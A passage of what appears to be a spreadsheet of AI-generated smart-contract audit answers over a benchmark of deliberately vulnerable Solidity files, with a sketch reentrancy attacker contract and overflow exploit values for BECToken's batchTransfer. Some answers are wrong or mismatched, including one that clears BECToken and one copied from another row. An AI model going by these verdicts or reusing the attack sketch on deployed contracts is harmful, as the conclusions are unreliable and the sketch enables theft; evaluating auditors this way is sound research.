  - If there's a token balance, it transfers the tokens from the caller to the contract. This involves an external call to the `transferFrom` function of the `HumanStandardToken` contract, which could be a potential location for reentrancy attacks if not handled correctly.
Given that there is an external call (`Channels[_lcID].token.transferFrom`) in the `createChannel` function, we need to ensure there are no state changes after this call that depend on external input. If there are, it might expose a reentrancy vulnerability.
Let's continue reviewing the code to understand the behavior fully and determine if any vulnerabilities exist.
Continuing with the `LedgerChannel` contract:
- `LCOpenTimeout` function:
  - This function allows the creator of a ledger channel to recover their deposits if the channel has not been opened by the counterparty within a specified timeout period.
  - If there's an Ether deposit, it sends the Ether back to the channel's creator.
  - If there's a token deposit, it transfers the tokens back to the channel's creator using the `transfer` function of the `HumanStandardToken` contract. This is another external call.
  - Finally, it deletes the channel's data to clean up the contract's state.
- `joinChannel` function:
  - Allows the second party (usually the intermediary) to join an existing ledger channel.
  - It has several checks, including ensuring the channel isn't open yet and ensuring the sender is the expected party.
  - If Ether is provided, it updates the channel's Ether balance with the sent amount (`msg.value`).
  - If there's a token balance, it transfers the tokens from the caller to the contract, similar to the `createChannel` function. Again, this is an external call to the `transferFrom` function of the `HumanStandardToken` contract.
Both the `LCOpenTimeout` and `joinChannel` functions involve external calls to token contracts. While these calls are generally safe in the context of ERC20 tokens, it's still crucial to ensure that no state changes occur after these calls that could be influenced by external actors.
Let's continue reviewing the remaining portions of the code.
1. Are there any reentrancy vulnerabilities? 
**Not sure.**
While I did not find explicit reentrancy vulnerabilities in the portions of the code I reviewed, there are several functions that make external calls to other contracts, specifically related to token transfers. These functions include `createChannel`, `LCOpenTimeout`, `joinChannel`, and `deposit`. External calls can potentially expose contracts to reentrancy attacks if not handled correctly.
2. how this vulnerability can be exploited :
Unfortunately, I couldn't conclusively determine if there are reentrancy vulnerabilities without thoroughly analyzing the complete logic and interactions of the contract. It's essential to carefully review the entire codebase, especially the parts that involve external calls or Ether transfers, to ensure safety. 
It would be best to consult with a professional Solidity auditor or conduct thorough testing to ensure there are no vulnerabilities in the contract.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
The potential vulnerability is the reentrancy attack due to the use of the `transfer` method before the state of the contract (i.e., the `Channels` mapping) is updated. The `transfer` function can be called to send ether to an external address. If that address is a contract, it could call the `LCOpenTimeout` function again before the original call to `LCOpenTimeout` has finished. This is what makes the function susceptible to a reentrancy attack.
To exploit this, an attacker can create a malicious contract that overrides its fallback function to call `LCOpenTimeout` again when it receives Ether. If the conditions are still met (e.g., `Channels[_lcID].isOpen` is still `false` and the current time is still greater than `Channels[_lcID].LCopenTimeout`), the attacker can drain more Ether from the contract than intended.
Here's a simplified example of a malicious contract that can exploit this vulnerability:
```solidity
contract Malicious {
    address victimContractAddress;
    constructor(address _victim) public {
        victimContractAddress = _victim;
    }
    function startAttack(bytes32 _lcID) public payable {
        // This assumes the victim contract has a function LCOpenTimeout that we're targeting
        Victim(victimContractAddress).LCOpenTimeout(_lcID);
    }
    // This is the fallback function which gets executed when the contract receives Ether
    fallback() external payable {
        if (address(this).balance &lt; someThreshold) {
            Victim(victimContractAddress).LCOpenTimeout(someLcID);
        }
    }
}
```
In the above code, when `startAttack` is called, it will call `LCOpenTimeout` on the victim contract. If the victim sends Ether to the malicious contract via the `transfer` method, the fallback function of the malicious contract will be triggered, which will again call `LCOpenTimeout` on the victim, potentially causing more Ether to be transferred than intended.
To mitigate this vulnerability, it's recommended to use the Checks-Effects-Interactions pattern, where state changes are made before calling external contracts or transferring Ether. In this case, `delete Channels[_lcID];` should be moved before the transfer and token transfer calls to prevent the potential reentrancy attack.</t>
  </si>
  <si>
    <t>dataset/arithmetic/BECToken.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function batchTransfer(address[] _receivers, uint256 _value) public whenNotPaused returns (bool) {
    uint cnt = _receivers.length;
    uint256 amount = uint256(cnt) * _value;
    require(cnt &gt; 0 &amp;&amp; cnt &lt;= 20);
    require(_value &gt; 0 &amp;&amp; balances[msg.sender] &gt;= amount);
    balances[msg.sender] = balances[msg.sender].sub(amount);
    for (uint i = 0; i &lt; cnt; i++) {
        balances[_receivers[i]] = balances[_receivers[i]].add(_value);
        Transfer(msg.sender, _receivers[i], _value);
    }
    return true;
  }
}</t>
  </si>
  <si>
    <t>Alright, I will begin by analyzing the provided Solidity code file "BECToken.sol". After reviewing the code, I will provide you with the requested format of the response.
Based on the initial overview, the code seems to be an implementation of an ERC20 token contract using Solidity. It starts with a `SafeMath` library, which provides basic arithmetic operations with safety checks that throw on error. This is followed by a basic ERC20 interface (`ERC20Basic`) and then the main `BasicToken` contract that implements this interface.
I will now further analyze the code for any potential vulnerabilities.
The code is organized into several sections. Here are the primary sections:
1. SafeMath (appears twice, likely an oversight)
2. ERC20Basic
3. Basic token
4. ERC20 interface
5. Standard ERC20 token
6. Ownable
7. Pausable
8. Pausable token
9. BEC Token
To provide a thorough assessment, I'll review each section one by one for vulnerabilities.
**SafeMath Library Analysis**:
This library provides basic arithmetic operations with safety checks.
1. **mul**: Multiplies two numbers, throws on overflow.
2. **div**: Divides two numbers. As the comment mentions, Solidity automatically throws when dividing by zero. So, no explicit check is needed.
3. **sub**: Subtracts two numbers, throws if subtraction result would be negative.
4. **add**: Adds two numbers, throws on overflow.
**Observations**:
- The SafeMath library is designed to prevent common arithmetic issues in Solidity like overflows and underflows.
- It uses the `require` statement to enforce conditions, which will throw and revert the transaction if the condition is not met.
**Vulnerabilities**:
- At a glance, the SafeMath library seems solid and does not exhibit any immediate vulnerabilities. Its design is meant to enhance the safety of arithmetic operations in Solidity.
Next, I will move on to analyzing the `ERC20Basic` section.
**ERC20Basic Contract Analysis**:
This contract provides a basic ERC20 interface with the following components:
1. **totalSupply**: A state variable to store the total supply of the token.
2. **balanceOf**: A function to get the balance of a specific address.
3. **transfer**: A function to transfer tokens from the sender's address to another address.
4. **Transfer**: An event that gets emitted when a transfer occurs.
**Observations**:
- This is a standard, basic ERC20 interface. It doesn't have implementations but only function signatures and an event. The actual implementation will likely be in the `Basic token` contract.
**Vulnerabilities**:
- As this is just an interface without actual implementations, there are no vulnerabilities directly within this section. The vulnerabilities, if any, would be in the implementing contracts.
Next, I'll analyze the `Basic token` section for potential vulnerabilities.
**BasicToken Contract Analysis**:
The `BasicToken` contract implements the `ERC20Basic` interface and provides the following components:
1. **balances**: A mapping that stores the token balance for each address.
2. **transfer**: Implements the token transfer functionality. It has checks to ensure:
   - The destination address is not the zero address.
   - The transfer value is positive and doesn't exceed the sender's balance.
   - It uses the `SafeMath` library to safely subtract from the sender's balance and add to the recipient's balance.
   - Emits a `Transfer` event upon a successful transfer.
3. **balanceOf**: Implements the balance query functionality. It simply returns the balance of the provided address.
**Observations**:
- The contract uses the `SafeMath` library for arithmetic operations, which is good for preventing overflows and underflows.
- The `transfer` function has the necessary checks to ensure valid transfers.
**Vulnerabilities**:
- At first glance, the `BasicToken` contract does not appear to have any glaring vulnerabilities. It provides a basic implementation of an ERC20 transfer without allowances.
Next, I'll analyze the `ERC20 interface` section.
**ERC20 Interface Analysis**:
The `ERC20` contract extends the `ERC20Basic` interface and introduces additional functionalities for allowances:
1. **allowance**: Returns the amount of tokens that an owner has allowed a spender to transfer on their behalf.
2. **transferFrom**: Allows a spender to transfer tokens from an owner's address to another address, but only up to the amount the owner has approved.
3. **approve**: Allows an owner to approve a spender to transfer up to a certain amount of tokens.
4. **Approval**: An event emitted when an approval is given by an owner to a spender.
**Observations**:
- This is a standard ERC20 interface that introduces the concept of allowances.
- As with `ERC20Basic`, this is just an interface, so there's no implementation here.
**Vulnerabilities**:
- As this is just an interface without actual implementations, there are no vulnerabilities directly within this section. The vulnerabilities, if any, would be in the implementing contracts.
Next, I'll analyze the `Standard ERC20 token` section.
**StandardToken Contract Analysis**:
The `StandardToken` contract implements the `ERC20` interface and provides the following components:
1. **allowed**: A mapping to store the amount of tokens that an owner has allowed a spender to transfer on their behalf.
2. **transferFrom**: Implements the token transfer functionality from one address to another using allowances. It has checks to ensure:
   - The destination address is not the zero address.
   - The transfer value is positive, doesn't exceed the sender's balance, and doesn't exceed the approved allowance.
   - Uses `SafeMath` for arithmetic operations.
   - Emits a `Transfer` event upon successful transfer.
3. **approve**: Allows an owner to approve a spender to transfer up to a certain amount of tokens. Emits an `Approval` event upon successful approval. There's a comment noting a potential race condition (known as the allowance double-spend exploit) and suggests a mitigation strategy.
4. **allowance**: Implements the allowance query functionality. Returns the amount of tokens that an owner has allowed a spender to transfer.
**Observations**:
- The contract uses the `SafeMath` library for arithmetic operations, which is good for preventing overflows and underflows.
- The `approve` function's comment mentions the allowance double-spend exploit, which is a known vulnerability with ERC20 tokens. The mitigation strategy suggested is to first set the allowance to 0 and then set the desired value, but this contract does not enforce this mitigation.
**Vulnerabilities**:
- **Allowance Double-Spend Exploit**: The `approve` function is susceptible to this exploit where, due to race conditions, a malicious spender could potentially spend both the old and new allowances. Although the comment in the code acknowledges this issue, the function itself does not enforce any mitigation.
Next, I'll analyze the `Ownable` section.
**Ownable Contract Analysis**:
The `Ownable` contract provides basic ownership management for contracts, including:
1. **owner**: A state variable to store the address of the contract owner.
2. **OwnershipTransferred**: An event that gets emitted when the ownership of the contract changes.
3. **Ownable (constructor)**: Sets the contract's initial owner to the account that deploys the contract.
4. **onlyOwner**: A modifier that restricts certain functions to be callable only by the current owner of the contract.
5. **transferOwnership**: Allows the current owner to transfer ownership of the contract to a new owner.
**Observations**:
- The contract uses a straightforward approach to manage contract ownership.
- The `transferOwnership` function has a check to ensure the new owner is not the zero address.
**Vulnerabilities**:
- At first glance, the `Ownable` contract seems to be solid and does not exhibit any immediate vulnerabilities. It provides basic functionalities for managing contract ownership.
Next, I'll analyze the `Pausable` section.
**Pausable Contract Analysis**:
The `Pausable` contract provides functionality for contracts to implement an emergency stop mechanism:
1. **Pause &amp; Unpause**: Events emitted when the contract is paused or unpaused.
2. **paused**: A state variable indicating whether the contract is currently paused.
3. **whenNotPaused**: A modifier that restricts certain functions to be callable only when the contract is not paused.
4. **whenPaused**: A modifier that restricts certain functions</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
The `batchTransfer` function in the provided code has an integer overflow vulnerability. 
The vulnerability can be observed in the line:
```solidity
uint256 amount = uint256(cnt) * _value;
```
If a malicious actor provides a sufficiently large value for `_value` and a large number of `_receivers` (e.g., 20), the multiplication result can overflow and wrap around, resulting in a smaller `amount` than intended.
This means that the `require(_value &gt; 0 &amp;&amp; balances[msg.sender] &gt;= amount);` check could pass even if the `msg.sender` doesn't have enough tokens for the transfer. As a result, the sender's balance could be decreased by an amount greater than their actual balance, and the recipients could receive tokens without the sender actually having them.
For example, let's consider a scenario:
- Let `_receivers.length` (i.e., `cnt`) be 20.
- Let `_value` be `MAX_UINT256 / 20 + 1`. 
In this case, `amount` will overflow and wrap around to a small value, and the `require` check will pass even if the sender doesn't have enough tokens.
The attacker can exploit this vulnerability to send more tokens than they have to multiple addresses.</t>
  </si>
  <si>
    <t>"""I will begin by reading and analyzing the provided file, """"BECToken.sol"""", to check for any arithmetic vulnerabilities.
The code provided appears to be a Solidity contract for an ERC20-like token. Based on the initial portion of the code, I can observe the following:
1. The code uses a `SafeMath` library for arithmetic operations to prevent overflows and underflows. This is a common practice in Solidity to ensure that arithmetic operations don't result in unexpected values due to the limitations of fixed-size integer types.
2. Functions like `mul`, `div`, `sub`, and `add` in the `SafeMath` library have safety checks (using the `require` statement) to ensure valid operations.
3. The contract defines an interface `ERC20Basic` and a `BasicToken` contract that implements it. The `transfer` function is provided, which uses the `SafeMath` operations for updating balances.
I'll analyze the rest of the code to determine if there are any arithmetic vulnerabilities.
Continuing from the previous section, the code defines the following:
1. A `balanceOf` function within the `BasicToken` contract that returns the balance of a specified address. This function simply fetches the balance from the `balances` mapping.
2. An `ERC20` interface that extends the previously mentioned `ERC20Basic` interface. This interface defines functions for `allowance`, `transferFrom`, and `approve`, which are standard functions in the ERC20 token specification.
3. The `StandardToken` contract that implements the `ERC20` interface and inherits from `BasicToken`. This contract defines a mapping called `allowed` that keeps track of the allowed spenders and the amount they are allowed to spend on behalf of the token owners.
4. The `transferFrom` function in the `StandardToken` contract allows for transferring tokens from one address to another, provided that the spender has been approved to spend that amount on behalf of the owner. The function uses the `SafeMath` library's operations to ensure arithmetic safety.
I will continue analyzing the next portion of the code to identify any potential arithmetic vulnerabilities.
Continuing the analysis:
1. The `approve` function allows a token owner to approve another address (the spender) to spend a certain amount of tokens on their behalf. The code includes a comment that highlights a potential race condition vulnerability related to changing an allowance. This is a well-known issue in the Ethereum community: if a user wants to change the allowance of a spender, they should first set it to 0 and then set the new value. This is because of the potential for both the old and new allowances to be used due to unfortunate transaction ordering. However, the `approve` function itself does not have an arithmetic vulnerability. It directly sets the allowance for a spender.
2. The `allowance` function returns the amount of tokens that an owner has allowed a spender to use on their behalf.
3. There's an `Ownable` contract that sets the `owner` of the contract to the address that deploys it. It provides a modifier (`onlyOwner`) that restricts certain functions to only be callable by the owner. The contract also has a `transferOwnership` function, which allows the current owner to transfer ownership of the contract to another address.
From the parts of the code I've reviewed so far, the arithmetic operations use the `SafeMath` library, which is designed to handle potential overflow and underflow vulnerabilities. 
Let's continue to review the remaining portions of the code.
Continuing from the previous section:
1. **Pausable Contract**: This contract is an extension of the `Ownable` contract and introduces the ability to pause and unpause contract functions. This can be used as a safety mechanism in case of emergencies.
2. **PausableToken Contract**: This contract extends both the `StandardToken` and `Pausable` contracts. It overrides the `transfer`, `transferFrom`, and `approve` functions to ensure they can only be executed when the contract is not paused. Additionally, there's a `batchTransfer` function that allows sending the same amount of tokens to multiple receivers. This function uses the `SafeMath` operations for arithmetic safety.
3. **BecToken Contract**: Represents the main token contract. It sets the token name as """"BeautyChain"""", symbol as """"BEC"""", and version as '1.0.0'. The contract initializes the total supply and assigns all tokens to the contract creator. It also contains a fallback function that reverts any Ether sent to the contract.
Based on my review:
- The arithmetic operations use the `SafeMath` library, which is designed to prevent potential overflow and underflow vulnerabilities.
- The `batchTransfer` function in the `PausableToken` contract has a limitation on the number of receivers (between 1 and 20) and checks that the sender has enough balance to cover the total transfer. The function updates balances using `SafeMath`.
Let's summarize the findings:
1. **Are there any arithmetic vulnerabilities?**
   - No.
From the provided """"BECToken.sol"""" code, the arithmetic operations are secured using the `SafeMath` library, which is designed to prevent potential overflow and underflow vulnerabilities. The contract also contains various checks and requirements to ensure the integrity of the operations."""</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
The vulnerability in the `batchTransfer` function is related to integer overflow. Specifically, the calculation of `amount`:
\[
\text{{amount}} = \text{{uint256(cnt)}} \times \text{{_value}}
\]
If a malicious actor chooses a very large `_value` and a sufficiently large `cnt` (length of the `_receivers` array), the result of the multiplication can overflow and wrap around to a small number. This would pass the `require` check:
\[
\text{{require}}(_\text{{value}} &gt; 0 \&amp;\&amp; \text{{balances[msg.sender]}} \geq \text{{amount}});
\]
Here's a step-by-step explanation:
- Let's assume that the balance of `msg.sender` is 10 tokens.
- Let's also assume that `_value` is set to a very large number, say \(2^{255}\), and `cnt` is set to 2. 
- The multiplication of these two numbers will result in an overflow, and `amount` might be a small value like 0.
- The `require` check will pass because 10 tokens (balance of `msg.sender`) is indeed greater than or equal to 0.
- However, in the subsequent loop, `_value` (which is \(2^{255}\)) will be added to the balances of the receivers, which means the `msg.sender` would be able to send far more tokens than they have.
This vulnerability can be exploited to arbitrarily increase the balances of the `_receivers` without the sender having the required amount in their balance.</t>
  </si>
  <si>
    <t>dataset/arithmetic/integer_overflow_1.sol</t>
  </si>
  <si>
    <t xml:space="preserve">     function add(uint value) returns (bool){
         sellerBalance += value; // possible overflow
         // possible auditor assert
         // assert(sellerBalance &gt;= value);
     }</t>
  </si>
  <si>
    <t>Alright, let's start by examining the contents of the file `integer_overflow_1.sol` which seems to be a Solidity contract based on the file extension. Solidity is a high-level language used for writing smart contracts on the Ethereum blockchain.
Let me read and display the contents of the file.
Based on the code provided:
```solidity
pragma solidity ^0.4.15;
contract Overflow {
    uint private sellerBalance=0;
    function add(uint value) returns (bool){
        sellerBalance += value; // possible overflow
        // possible auditor assert
        // assert(sellerBalance &gt;= value);
    }
  // function safe_add(uint value) returns (bool){
  //   require(value + sellerBalance &gt;= sellerBalance);
  // sellerBalance += value;
  // } 
}
```
1. Are there any vulnerabilities?
   - **Yes**.
2. how this vulnerability can be exploited :
   - **Integer Overflow**: The function `add` is vulnerable to integer overflow. When a value is added to `sellerBalance`, there's no check to ensure that the result of the addition doesn't exceed the maximum value that a `uint` can hold. If `sellerBalance` is close to the maximum value of a `uint` and a large value is added, the result will wrap around to a small number, effectively resetting `sellerBalance`. A malicious actor can exploit this to set the `sellerBalance` to a value of their choice.
     For instance, if `sellerBalance` is `2**256 - 1` (the maximum value of a `uint256`) and the attacker calls `add(1)`, the `sellerBalance` will wrap around and become `0`.
   - Additionally, there's a commented out `assert` statement that checks if `sellerBalance` is greater than or equal to `value`. If this assertion was active and an overflow occurred, the contract would revert all changes, which can be a protection mechanism against overflow. However, in its current state, this protection is commented out and thus ineffective.
   - There's also a commented out `safe_add` function that checks for overflow before adding. This would be a safer way to add values to `sellerBalance`, but it's not currently active in the contract.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
The code has an integer overflow vulnerability. The `sellerBalance` variable can overflow when a large `value` is added to it, resulting in an unexpected and incorrect balance. If `sellerBalance` is close to the maximum value for a `uint` and we add a `value` that exceeds the remaining difference, the `sellerBalance` will wrap around to a small value.
Example:
Assuming `uint` is a 256-bit unsigned integer and `sellerBalance` is close to its maximum value, say:
\[
\text{{sellerBalance}} = 2^{256} - 2
\]
If we add `value = 2` to it, the `sellerBalance` will overflow and become 0, which is incorrect and can lead to a loss of funds.
The commented-out `assert` statement would have been a mitigation for this vulnerability, as it checks that the post-addition balance is always greater than or equal to the added value. If the overflow occurs, this assertion would fail, and the transaction would be reverted.</t>
  </si>
  <si>
    <t>Alright, let's first take a look at the code you've provided.
The provided Solidity code represents a simple contract named "Overflow" which has the following properties and functions:
1. A private state variable named `sellerBalance` initialized to 0.
2. A public function named `add` which takes a `uint` argument named `value` and adds this value to `sellerBalance`.
3. The function `add` has a comment indicating a possible overflow.
4. There's a commented-out possible auditor assert line that checks if after addition, `sellerBalance` is greater than or equal to `value`.
5. There's a commented-out function `safe_add` which seems to provide a safer way to add the value to `sellerBalance` by using the `require` statement to ensure no overflow happens.
**Analysis:**
1. **Are there any arithmetic vulnerabilities?**
   - Yes.
2. **how this vulnerability can be exploited :**
   - The vulnerability here is the potential for an integer overflow in the `add` function.
   - An integer overflow occurs when an arithmetic operation attempts to create a numeric value that is outside the range that can be represented with a given number of bits – either larger than the maximum or lower than the minimum representable value.
   - In the function `add`, the value of `sellerBalance` is increased by `value` without any checks for overflow. This means if someone were to call `add` with a sufficiently large `value`, `sellerBalance` could wrap around and become much smaller than expected.
   - For example, if `sellerBalance` is close to the maximum value for a `uint` and a large `value` is added to it, `sellerBalance` could wrap around to a small number.
The commented-out lines in the code suggest that the developer was aware of the potential vulnerability and considered using `assert` or the `require` statement to prevent the overflow. The `safe_add` function, if uncommented and used, would mitigate the overflow issue by ensuring that the sum of `value` and `sellerBalance` is always greater than or equal to `sellerBalance` before performing the addition.</t>
  </si>
  <si>
    <t>1. Are there any arithmetic vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The function `add` contains a potential arithmetic overflow vulnerability. In the expression `sellerBalance += value;`, if the sum of `sellerBalance` and `value` exceeds the maximum value of the `uint` data type, the result will wrap around, causing an overflow.
For instance, consider the scenario where:
- `sellerBalance` is close to the maximum value for a `uint` (let's denote this as `MAX_UINT`).
- A large value of `value` is added, such that `sellerBalance + value &gt; MAX_UINT`.
The resulting `sellerBalance` will be less than its previous value, rather than increasing, which is not the intended behavior and can lead to unexpected and undesirable consequences.
To demonstrate, let's assume that the maximum value for a `uint` (for simplicity, we'll use 32 bits for this example) is \(2^{32} - 1\). If `sellerBalance` is \(2^{32} - 1\) and `value` is 1, then after the addition, `sellerBalance` will wrap around to 0 instead of becoming \(2^{32}\), which is beyond the capacity of a 32-bit unsigned integer.</t>
  </si>
  <si>
    <t>dataset/arithmetic/insecure_transfer.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function transfer(address _to, uint256 _value) public{
        require(balanceOf[msg.sender] &gt;= _value);
        balanceOf[msg.sender] -= _value;
        balanceOf[_to] += _value;
}</t>
  </si>
  <si>
    <t>1. **Is there any denial of service vulnerabilities?** No.</t>
  </si>
  <si>
    <t>dataset/arithmetic/integer_overflow_add.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function run(uint256 input) public {
        count += input;
    }</t>
  </si>
  <si>
    <t>Alright, I'll start by reviewing the content of the file `integer_overflow_add.sol` to identify any potential vulnerabilities.
Here's the content of the provided Solidity file:
```solidity
// Single transaction overflow
// Post-transaction effect: overflow escapes to publicly-readable storage
pragma solidity ^0.4.19;
contract IntegerOverflowAdd {
    uint public count = 1;
    function run(uint256 input) public {
        count += input;
    }
}
```
1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The contract has an integer overflow vulnerability. The public `count` variable is initialized to 1, and the `run` function adds the `input` argument to `count`. If a sufficiently large value is provided as `input`, the `count` variable can overflow.
For instance, if `count` is `2^256 - 1` (maximum value for a `uint256`) and `input` is set to `2`, the result will overflow, and `count` will be set to `1`.
Let's demonstrate this: 
Given that `uint256` has a maximum value of \(2^{256} - 1\), if we use this value as the current state of `count` and add `2` as the `input`, `count` will roll over and become `1`.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities?
Answer: Yes.
2. how this vulnerability can be exploited :
The code does not have any checks on the value of `input`, which means that an attacker can potentially overflow the `count` variable by sending a large enough `input`. If `count` overflows, it will wrap around and start from zero again. This can lead to unintended behavior and potentially exploited in various scenarios depending on how `count` is used in the rest of the smart contract.</t>
  </si>
  <si>
    <t>Alright, let's start by examining the contents of the provided file, which appears to have the ".sol" extension. This suggests it's a Solidity contract, commonly used for Ethereum smart contracts. I'll read the file and then analyze its contents.
The provided code is a Solidity smart contract named `IntegerOverflowAdd`. Here's the content of the contract:
```solidity
//Single transaction overflow
//Post-transaction effect: overflow escapes to publicly-readable storage
pragma solidity ^0.4.19;
contract IntegerOverflowAdd {
    uint public count = 1;
    function run(uint256 input) public {
        count += input;
    }
}
```
**Analysis**:
1. **Are there any arithmetic vulnerabilities?** 
Yes.
2. **how this vulnerability can be exploited **:
The contract has an unsigned integer variable named `count` which is publicly readable and initialized to 1. The function `run` takes an input of type `uint256` and adds this input to the `count` variable. This operation is vulnerable to integer overflow. 
If a sufficiently large value is passed to the `run` function, the addition can cause the `count` variable to overflow and wrap around. For example, if `count` is at its maximum value (`2^256 - 1`), and we add 1 to it, it will overflow and become 0.
As a proof of concept, if we call the `run` function with the value `2^256 - 1` (maximum value for `uint256`), then the `count` variable will overflow and the result will be 0.</t>
  </si>
  <si>
    <t>1. Are there any arithmetic vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The function `run` adds the value of `input` to the `count` variable. This can result in an integer overflow if the sum of `count` and `input` exceeds the maximum value of a `uint256` (which is \(2^{256} - 1\)). If the overflow occurs, the value of `count` will wrap around and start from zero again. 
For example, if `count` is currently set to \(2^{256} - 2\) and we call `run(2)`, the result will not be \(2^{256}\) (because this is out of bounds for `uint256`). Instead, `count` will be set to 1 due to overflow.</t>
  </si>
  <si>
    <t>dataset/arithmetic/integer_overflow_benign_1.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function run(uint256 input) public {
        uint res = count - input;
    }</t>
  </si>
  <si>
    <t>Let me first review the uploaded Solidity code.
The provided Solidity code is as follows:
```solidity
//Single transaction overflow
//Post-transaction effect: overflow never escapes function
pragma solidity ^0.4.19;
contract IntegerOverflowBenign1 {
    uint public count = 1;
    function run(uint256 input) public {
        uint res = count - input;
    }
}
```
1. Are there any vulnerabilities? 
**Answer**: Yes.
2. how this vulnerability can be exploited :
The code has an integer underflow vulnerability. In the `run` function, if an `input` value greater than `count` (which is initialized to `1`) is provided, then `res` will underflow. However, the underflow doesn't have any post-transaction effects since the result `res` is not stored or returned.</t>
  </si>
  <si>
    <t>1. Yes, there is a vulnerability in the given Solidity contract.
2. Proof of Concept of this Vulnerability: 
   This contract has an Integer Underflow vulnerability. The `run` function subtracts an input from the `count` variable, but does not check if the input is greater than `count`. This could lead to a situation where the calculation `count - input` results in a negative number. However, since `count` is a `uint` (unsigned integer), it cannot represent negative numbers and will instead wrap around to a very large number. This is known as integer underflow.
3. The Business Impact of this Vulnerability in one sentence: 
   The `run` function leads to an Integer Underflow, potentially causing unexpected behavior and security issues, such as unauthorized fund withdrawal or broken business logic.
4. The Potential Solutions of this Vulnerability:
   To prevent this vulnerability, it is important to check for underflows and overflows in arithmetic operations. The Solidity programming language provides the SafeMath library for this purpose. Below is the corrected contract using the SafeMath library:
```solidity
pragma solidity ^0.4.19;
import "./SafeMath.sol";
contract IntegerOverflowBenign1 {
    using SafeMath for uint;
    uint public count = 1;
    function run(uint256 input) public {
        uint res = count.sub(input);
    }
}
```
In this modified code, the `sub` function from the SafeMath library is used for subtraction. This function will throw an exception if an underflow occurs, preventing the execution of the contract with invalid state.</t>
  </si>
  <si>
    <t>Alright, I'll first read and analyze the provided Solidity code to check for any arithmetic vulnerabilities.
The provided Solidity code consists of a smart contract named `IntegerOverflowBenign1`. Here's a brief overview of its structure:
1. It uses the Solidity version `0.4.19`.
2. The contract has a public state variable named `count` which is initialized to `1`.
3. The contract has a single public function `run` which takes an unsigned 256-bit integer `input` as an argument. Inside this function, there's an arithmetic operation that subtracts `input` from `count`, and the result is stored in the local variable `res`.
Now, let's analyze the code for arithmetic vulnerabilities:
1. **Are there any arithmetic vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   The function `run` performs a subtraction operation without any checks. If the value of `input` is greater than the value of `count`, the subtraction will result in an integer underflow. Since Solidity uses modular arithmetic, the result would wrap around and produce a very large number close to \(2^{256} - 1\).
   It's worth noting, however, that this vulnerability does not have any lasting impact outside the function, as the result `res` is a local variable and is not stored or returned. Thus, while there is a vulnerability, its effects are confined within the function, and no state variables or external factors are impacted.</t>
  </si>
  <si>
    <t>1. Are there any arithmetic vulnerabilities? 
Answer: **yes**.
2. how this vulnerability can be exploited :
The vulnerability present in this code is due to potential integer underflow. When the function `run` is called with a value for `input` that is greater than the value of `count`, the result of `count - input` will underflow, causing `res` to have a very large value.
For example:
Assume `count` is `5` and `input` is `10`. The result of `count - input` would be `-5`, but since Solidity uses unsigned integers, this would actually result in a value of `2^256 - 5` being assigned to `res`.</t>
  </si>
  <si>
    <t>dataset/arithmetic/integer_overflow_mapping_sym_1.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function init(uint256 k, uint256 v) public {
        map[k] -= v;
    }</t>
  </si>
  <si>
    <t>1. Are there any arithmetic vulnerabilities? 
Answer: **yes**.
2. how this vulnerability can be exploited :
The vulnerability present in this code is due to potential integer underflow. When the function `run` is called with a value for `input` that is greater than the value of `count`, the result of `count - input` will underflow, causing `res` to have a very large value.
For example:
Assume `count` is `5` and `input` is `10`. The result of `count - input` would be `-5`, but since Solidity uses unsigned integers, this would actually result in a value of `2^256 - 5` being assigned to `res`.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Yes.
2. Explain in details how this vulnerability can be exploited:
The vulnerability is an Integer Underflow vulnerability that is present in the `init` function. In Solidity, uint256 is an unsigned integer type which means it can only have positive values, but here in the `init` function, `map[k]` is subtracted by `v` without any check to ensure `map[k]` is greater or equal to `v`. If `v` is greater than `map[k]`, it will underflow and wrap around to a very large number because uint256 has a range of 0 to \(2^{256} - 1\).
3. The business impact of this vulnerabilities in one sentence: 
The `init` function leads to an Integer Underflow, which can allow an attacker to manipulate the state of the contract and possibly steal funds, disrupt operations or manipulate contract logic.
4. The potential solutions of this vulnerabilities:
There are a few potential solutions to this issue:
a) Adding a require statement to check that `v` is less than or equal to `map[k]` before the subtraction:
```solidity
function init(uint256 k, uint256 v) public {
    require(map[k] &gt;= v, "Underflow prevention");
    map[k] -= v;
}
```
b) Use SafeMath library for subtraction which automatically checks for underflows and overflows:
```solidity
import "@openzeppelin/contracts/math/SafeMath.sol";
contract IntegerOverflowMappingSym1 {
    using SafeMath for uint256;
    mapping(uint256 =&gt; uint256) map;
    function init(uint256 k, uint256 v) public {
        map[k] = map[k].sub(v);
    }
}
```
c) Upgrade to a later Solidity version (0.8.0 or later) where automatic checks for underflow and overflow are included. The contract would revert if an underflow or overflow occurs.</t>
  </si>
  <si>
    <t>Alright, let me first review the provided Solidity code.
Thank you for providing the code. Here's a quick analysis:
1. **Are there any arithmetic vulnerabilities?**
   - Yes.
2. **how this vulnerability can be exploited :**
   - The vulnerability is in the line `map[k] -= v;`. If the value of `v` is greater than the value currently stored in `map[k]`, this will result in an underflow. For instance, if `map[k]` is `0` and `v` is `1`, then after the subtraction, `map[k]` will become a very large number due to underflow.
3. **The business impact of these vulnerabilities in one sentence:**
   - The underflow in the `init` function leads to incorrect mapping values that can be exploited.
4. **The potential solutions of this vulnerability:**
   - Implement SafeMath or similar libraries to handle arithmetic operations safely.
   - Use built-in overflow/underflow checks if using a more recent version of Solidity.
   - Manually check for underflows before performing the subtraction.
Would you like a deeper explanation or further assistance on any of these points?</t>
  </si>
  <si>
    <t>"1. Are there any arithmetic vulnerabilities?
Answer: Yes.
2. how this vulnerability can be exploited :
The line `map[k] -= v;` can underflow if the value of `map[k]` is less than `v`.
3. The business impact of these vulnerabilities in one sentence:
Underflow in the `init` function leads to incorrect mapping values.
